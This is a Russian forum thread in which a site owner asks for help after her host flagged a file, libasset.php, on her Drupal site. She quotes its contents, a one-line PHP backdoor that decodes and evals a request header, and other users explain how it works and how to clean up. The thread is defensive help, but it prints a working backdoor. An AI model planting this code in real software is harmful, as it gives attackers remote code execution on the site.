Ответить на тему  [ Сообщений: 5 ] 
Вредоносное содержимое 
Автор Сообщение
Опытный

Зарегистрирован: 05 сен 2011, 21:24
Сообщений: 322
Пол: женский
Репутация: 290
Добавить пункт репутацииВычесть пункт репутации
Сообщение Вредоносное содержимое
Подскажите, умоляю, никогда не сталкивалась с таким и не знаю вобще в какую сторону копать
Проблема в следующем -
хостинг провайдер прислал мне письмо следующего содержимого
В ходе плановой проверки на Вашем аккаунте было обнаружено подозрительное, потенциально вредоносное, содержимое.
/home/a/annarubina/public_html/sites/libasset.php : PHP.HostComm.#28463.evb64.0.UNOFFICIAL

Что делать? Что это вобще за файл? Как найти в нем ошибку? Как она может выглядеть?
Подскажите?

Если поможет - в этом файле следующие строки
<?php if(@isset($_SERVER[HTTP_4B6F6])){@eval(base64_decode($_SERVER[HTTP_4B6F6]));}exit;?><span class="ajax-new-content"></span>sites/libasset.phpmarkupArrayArraysites/libasset.php

_________________
http://layf.info/ - информируйся и развлекайся


03 май 2018, 17:18
Профиль Отправить личное сообщение WWW
Модератор
Аватар пользователя

Зарегистрирован: 09 мар 2010, 00:53
Сообщений: 4082
Репутация: 2904
Добавить пункт репутацииВычесть пункт репутации
Сообщение Re: Вредоносное содержимое
Точно с таким файлом не сталкивался.
Можно попробовать убрать файл libasset.php и посмотреть будет ли работать сайт и не появится ли этот файл снова.
Если ок, то попросить хостера проверить ещё раз.
Скопировать все файлы сайта домой и программой (например, НотеПад++), которая может искать в файлах не открывая их, поискать в коде вызов этого файла.
Ещё попробовать программу AI-Bolit, но файл libasset.php при проверке должен быть на своём месте.
Ну и поиск в сети по имени этого файла.

_________________
Не забывайте отдыхать!
www.jscan.ru - ежедневно новые японские сканворды и судоку различной сложности!


03 май 2018, 18:09
Профиль Отправить личное сообщение WWW
Опытный

Зарегистрирован: 05 сен 2011, 21:24
Сообщений: 322
Пол: женский
Репутация: 290
Добавить пункт репутацииВычесть пункт репутации
Сообщение Re: Вредоносное содержимое
Vladis писал(а):
Точно с таким файлом не сталкивался.
Можно попробовать убрать файл libasset.php и посмотреть будет ли работать сайт и не появится ли этот файл снова.


Вобщем удалила я этот файл совсем - вроде сайт работает. А что это за файл вообще? Он какую-то функцую выполняет?

_________________
http://layf.info/ - информируйся и развлекайся


03 май 2018, 19:03
Профиль Отправить личное сообщение WWW
Опытный

Зарегистрирован: 12 дек 2011, 21:34
Сообщений: 546
Пол: мужской
Репутация: 1046
Добавить пункт репутацииВычесть пункт репутации
Сообщение Re: Вредоносное содержимое
Про файл...
Если ещё остался где-нибудь не удаленный и если на самом деле интересно, можно посмотреть его :oops: Анжела, кинь в личку, если найдешь.

Хостер ругается потому, что обнаружил eval(base64_decode). Там где-то должен быть набор букво-символов (это и есть шифрование base64_decode), а eval - выполнение того, что будет расшифровано при обработке браузером. Поэтому, без букво-символов сказать сложно, что он делает.

Кстати, один из способов узнать, что же там расшифровывается и исполняется - заменить eval на print, тогда скрипт будет не исполнять код, а выводить на экран. :crazy:

P.S. Я подозреваю, что простым удалением файла дело не окончится...
Тебе обязательно надо:
1. Сменить все логины/пароли (не только от сайта, но и от панели хостинга)
2. Если есть ftp-пользователи - желательно отключить.
3. Обязательно обновить Друпал! Они за последние полтора месяца два релиза безопасности выпустили. По последнему, если не ошибаюсь, уровень угрозы не то 21, не то 23 из 25. То есть, если не обновиться в течении 7 часов после релиза нового ядра Друпал, сайт автоматом можно считать скомпрометированным.
4. Посмотри права на каталоги. Друпал рекомендует 755.

Ещё один действенный метод проверки:
- посмотреть, какая версия Друпал используется (например, 7.50)
- скачать сайт (все файлы и каталоги) на рабочий комп
- скачать с официального сайта голый Друпал версии 7.50
- распаковать в соседний каталог
- после этого методом "тупого сравнения" всего (кроме каталога sites) найти отличия: добавленные файлы, добавленные каталоги... Могут использоваться ядерные друпаловые файлы, но с дописками. Тогда размер этих файлов будет отличаться от друпаловых.
Если не ошибаюсь, под винду была программа windiff, которая позволяла сравнить каталоги с выводом информации о добавленных файлах, довесках в самих файлах...

Если на сайте не правила ядерные файлы/шаблоны/модули, то этот метод покажет изменения, которых ты не делала...


03 май 2018, 21:06
Профиль Отправить личное сообщение
Модератор
Аватар пользователя

Зарегистрирован: 09 мар 2010, 00:53
Сообщений: 4082
Репутация: 2904
Добавить пункт репутацииВычесть пункт репутации
Сообщение Re: Вредоносное содержимое
Что выполняется, зависит от того, какой текст лежит в переменно $_SERVER[HTTP_4B6F6] и от того, существует ли такая переменная во время работы php при вызове страниц сайта.
Работает это примерно так.
Если (if) есть переменная $_SERVER[HTTP_4B6F6]:
- перекодировать (base64_decode) текст из этой переменной,
- принять его за инструкции php и выполнить (eval),
- и дальнейший код, например, родной код сайта, отбросить не выполняя (exit)
иначе, если переменной $_SERVER[HTTP_4B6F6] нет:
- послать в браузер строку '<span class="ajax-new-content"></span>sites/libasset.phpmarkupArrayArraysites/libasset.php'.

Судя по строке ajax-new-content, можно ожидать, что javascript тоже что-то пытается "кривить" в браузере посетителей.

Добавлено спустя 6 минут 30 секунд:
Val_Ery писал(а):
... под винду была программа windiff...
Ещё от MS есть бесплатно родная программа WinMerge

_________________
Не забывайте отдыхать!
www.jscan.ru - ежедневно новые японские сканворды и судоку различной сложности!


03 май 2018, 21:18
Профиль Отправить личное сообщение WWW
Показать сообщения за:  Сортировать по:  
Ответить на тему   [ Сообщений: 5 ] 
   Похожие темы   Автор   Ответов   Просмотров   Последнее сообщение 
Нет новых непрочитанных сообщений в этой теме ПРОФИ! Как вывести содержимое одним запросом из двох таблиц?

в форуме PHP , БАЗЫ ДАННЫХ, ЛОКАЛЬНЫЙ СЕРВЕР

pasha5282

5

1191

17 июн 2013, 15:28

Dark_Dante Перейти к последнему сообщению

Нет новых непрочитанных сообщений в этой теме Содержимое колонок идет последовательно, а не паралельно

в форуме ШАБЛОНЫ И ВНЕШНЕЕ ОФОРМЛЕНИЕ JOOMLA

Лорд Лотар

6

818

30 май 2011, 14:33

Лорд Лотар Перейти к последнему сообщению

Нет новых непрочитанных сообщений в этой теме Не отображается группа полей Содержимое во Views

в форуме Drupal 6

vlad_cheb

2

1001

31 окт 2011, 19:36

abutan Перейти к последнему сообщению

Нет новых непрочитанных сообщений в этой теме Как сделать так чтобы содержимое прокручивалось а фон нет?

в форуме DREAMWEAVER

danek.com

4

1695

23 мар 2012, 15:51

zhoo Перейти к последнему сообщению

Нет новых непрочитанных сообщений в этой теме Содержимое не отображается на главной странице

в форуме Drupal 6

gorelli

2

731

03 мар 2012, 14:14

gorelli Перейти к последнему сообщению


Кто сейчас на форуме

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 1


Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете добавлять вложения

Перейти: